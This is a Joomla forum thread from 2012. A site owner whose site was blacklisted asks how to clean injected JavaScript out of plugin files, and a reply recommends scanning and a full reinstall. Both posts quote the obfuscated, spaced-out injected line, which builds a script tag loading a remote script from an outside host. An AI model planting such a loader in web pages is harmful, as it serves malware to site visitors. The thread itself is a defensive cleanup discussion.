The Joomla! Forum ™

Download

Demo


Board index » Joomla! Older Version Support » Joomla! 1.5 » Security in Joomla! 1.5

Forum rules


Forum Rules
Absolute Beginner's Guide to Joomla! <-- please read before posting, this means YOU.
Security Checklist
Forum Post Assistant - If you are serious about wanting help, you will use this tool to help you post.



Post new topic Reply to topic  Page 1 of 1
  [ 2 posts ] 
  Print view Previous topic | Next topic 
Author Message
slowie12
PostPosted: Tue Apr 17, 2012 4:39 pm 
Joomla! Fledgling
Joomla! Fledgling

Joined: Tue Apr 17, 2012 3:59 pm
Posts: 1
A site I built has been blacklisted by Google because of malicious software. A very kind person over at badware busters provided the following information:

You have some hacks in your js files, in these 2
http://mywebsite.com//plugins/system/cd ... onflict.js
http://mywebsite.com//plugins/system/cd ... 4.4.min.js

doc ument.write ('< sc ript language="JavaScript" type="text/javascript" src="'+'e'+'d'+'i'+'t'+'i'+'o'+'n'+'.'+'c'+'h'+'/'+'f'+'i'+'l'+'e'+'s'+'/'+'M'+'e'+'i'+'n'+'_'+'L' +'e'+'h'+'r'+'b'+'e'+'t'+'r'+'i'+'e'+'b'+'/'+'f'+'7'+'e'+'6'+'c'+'8'+'5'+'.'+'j'+'s"> < / sc ript > ');

Can I just edit this out?

I will do what I should to restore the site integrity but is there anything I can do to prevent this recurring. The site is on 1.5.26 on a Zeus server and all the permissions are as recommended here and elsewhere. No passwords are stored on my computer, though I can't speak for the site admin (who does not have Super Admin rights). I haven't been able to detect any Malware locally.

And how was the badware adviser guy able to find this? Is there some way I can scan for the same obfuscated script on the rest of the site?

Any help would be much appreciated.
Top
 Profile  
 
ketchupaholic
PostPosted: Thu Aug 02, 2012 4:39 am 
Joomla! Apprentice
Joomla! Apprentice

Joined: Thu Jul 09, 2009 3:55 pm
Posts: 11
slowie12 wrote:
A site I built has been blacklisted by Google because of malicious software. A very kind person over at badware busters provided the following information:

You have some hacks in your js files, in these 2
http://mywebsite.com//plugins/system/cd ... onflict.js
http://mywebsite.com//plugins/system/cd ... 4.4.min.js

doc ument.write ('< sc ript language="JavaScript" type="text/javascript" src="'+'e'+'d'+'i'+'t'+'i'+'o'+'n'+'.'+'c'+'h'+'/'+'f'+'i'+'l'+'e'+'s'+'/'+'M'+'e'+'i'+'n'+'_'+'L' +'e'+'h'+'r'+'b'+'e'+'t'+'r'+'i'+'e'+'b'+'/'+'f'+'7'+'e'+'6'+'c'+'8'+'5'+'.'+'j'+'s"> < / sc ript > ');

Can I just edit this out?

I will do what I should to restore the site integrity but is there anything I can do to prevent this recurring. The site is on 1.5.26 on a Zeus server and all the permissions are as recommended here and elsewhere. No passwords are stored on my computer, though I can't speak for the site admin (who does not have Super Admin rights). I haven't been able to detect any Malware locally.

And how was the badware adviser guy able to find this? Is there some way I can scan for the same obfuscated script on the rest of the site?

Any help would be much appreciated.



Bud! I just got done going through the same garbage! Replace your httacces file, and all your index.html files are all probably infected as well as some js files. go here to run a report. http://sitecheck.sucuri.net/scanner/

But if I were you. I'd back up your database, blow it all away and reinstall the latest version. Trust me. I've been working with Mambo/Joomla for over 10 years now. It happens. 8(
Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  Page 1 of 1
  [ 2 posts ] 


Board index » Joomla! Older Version Support » Joomla! 1.5 » Security in Joomla! 1.5

Who is online

Users browsing this forum: No registered users and 15 guests

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Jump to:  
Powered by phpBB® Forum Software © phpBB Group